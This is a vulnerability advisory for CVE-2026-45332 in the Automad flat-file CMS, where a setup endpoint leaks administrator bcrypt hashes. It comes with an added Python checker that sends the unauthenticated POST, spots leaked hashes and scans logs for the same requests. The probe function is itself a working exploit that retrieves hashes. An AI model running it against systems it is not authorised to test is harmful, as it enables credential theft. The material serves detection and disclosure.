HIGH
marcantondahmen
CVE published 2026-05-28
CVE-2026-45332
Automad flat-file CMS versions 2.0.0-alpha.1 through 2.0.0-beta.27 contain a Broken Access Control vulnerability that allows unauthenticated attackers to retrieve bcrypt password hashes for all administrator accounts via a single POST request to the `/_api/user-collection/create-first-user` endpoint. This setup endpoint remains publicly accessible after initial configuration and returns full serialized us [truncated]
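As an added example, not part of the advisory and not Automad's own code: a small Python checker that (a) flags any bcrypt hash leaked in a response body, (b) probes an instance's `/_api/user-collection/create-first-user` endpoint with an unauthenticated POST, as the advisory describes, and (c) scans web-server access logs for hits on that endpoint. The hostname, the sample response body and the sample log lines are constructed for illustration; the check matches on the bcrypt hash format rather than on any assumed JSON schema, so it does not depend on how the endpoint serializes user records. Only run the probe against an instance you are authorized to test.

```python
import re
import sys
import urllib.error
import urllib.request

# Added example, not Automad's own code. ENDPOINT is the path named in the
# advisory; SAMPLE_RESPONSE and SAMPLE_LOG are constructed test data.
ENDPOINT = "/_api/user-collection/create-first-user"

# Modular-crypt bcrypt: $2a$/$2b$/$2x$/$2y$, two-digit cost, then a 22-char
# salt plus 31-char digest in the bcrypt base64 alphabet (53 chars, 60 total).
BCRYPT_RE = re.compile(r"\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}")

# Apache/nginx combined log format: ip ident user [ts] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample body; the hash value is a dummy in valid bcrypt shape.
SAMPLE_RESPONSE = (
    '{"data":{"users":[{"name":"admin","password":'
    '"$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"}]}}'
)

# Constructed sample log lines.
SAMPLE_LOG = """\
203.0.113.7 - - [28/May/2026:10:14:02 +0000] "POST /_api/user-collection/create-first-user HTTP/1.1" 200 812 "-" "curl/8.5.0"
198.51.100.3 - - [28/May/2026:10:14:05 +0000] "GET /dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def bcrypt_hashes_in(body: str) -> list:
    """Return every bcrypt-format hash found anywhere in a response body."""
    return BCRYPT_RE.findall(body)


def is_exposed(body: str) -> bool:
    """Any bcrypt hash in a response to an unauthenticated request is a leak."""
    return bool(bcrypt_hashes_in(body))


def probe(base_url: str, timeout: float = 10.0) -> tuple:
    """POST an empty body to the setup endpoint with no credentials.

    Returns (status, body). A patched instance with an existing user should
    refuse the request and the body should contain no hashes.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT, data=b"", method="POST"
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def setup_endpoint_hits(lines) -> list:
    """Return POST requests to the setup endpoint seen in access-log lines.

    Each hit is a dict with ip, timestamp, path and status; a 200 after the
    site was configured is the indicator of a successful hash dump.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method == "POST" and path.split("?", 1)[0] == ENDPOINT:
            hits.append({"ip": ip, "timestamp": ts, "path": path, "status": int(status)})
    return hits


if __name__ == "__main__":
    # Usage: python check_automad.py https://cms.example.test [access.log]
    if len(sys.argv) < 2:
        sys.exit("usage: check_automad.py <base-url> [access-log]")
    status, body = probe(sys.argv[1])
    hashes = bcrypt_hashes_in(body)
    print(f"HTTP {status}: {len(hashes)} bcrypt hash(es) in response"
          f" -> {'VULNERABLE' if hashes else 'no hash exposure observed'}")
    if len(sys.argv) > 2:
        with open(sys.argv[2], encoding="utf-8", errors="replace") as fh:
            for hit in setup_endpoint_hits(fh):
                print(f"{hit['timestamp']} {hit['ip']} POST {hit['path']} {hit['status']}")
```

The probe sends no credentials by design: the advisory's point is that the endpoint answers without any, so a response that still contains hashes after the first user has been created is the vulnerable condition. The log scan is the retrospective check for the same request pattern, since a single POST is enough and leaves only one line of evidence.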